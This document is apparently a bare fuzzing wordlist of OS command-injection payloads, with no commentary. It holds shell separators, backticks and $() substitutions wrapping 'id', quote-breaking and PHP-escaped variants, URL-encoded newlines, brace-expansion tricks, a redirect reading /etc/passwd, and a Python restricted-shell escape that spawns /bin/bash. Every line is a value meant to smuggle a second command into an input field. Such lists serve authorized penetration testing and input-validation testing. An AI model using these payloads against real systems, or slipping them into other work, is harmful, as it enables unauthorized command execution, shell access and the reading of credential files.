echo $SHELL
id
;
|
&
&&
||
;;
`
``
;id
;id'
;id"
';id
";id
|id
|id'
|id"
'|id
"|id
&id
&id'
&id"
'&id
"&id
&&id
&&id'
&&id"
'&&id
"&&id
||id
||id'
||id"
'||id
"||id
`id`
$(id)
(id)
$
$PATH
$$
$(id)
>test
>>test
</etc/passwd
<<testfile
<<<hello
 2>&1
$@
~
~+
~-
!!
!#

# PHP escaping
\;id
\'\;id
\"\;id
\|id
\'\|id
\"\|id
\&id
\'\&id
\"\&id
\&\&id
\'\&\&id
\"\&\&id
\|\|id
\'\|\|id
\"\|\|id
\|\|id
\`id\`

# URL encoded
%0d
%0a

)
))
(
((
}
}}
{
{{
^
^^
!!
,-v}
,-h}
,--help}
{echo,hello}
;{echo,hello}
|{echo,hello}
||{echo,hello}

# Other stuff
# Python lshell
echo os.system("/bin/bash")

# Spawning TTY
https://netsec.ws/?p=337
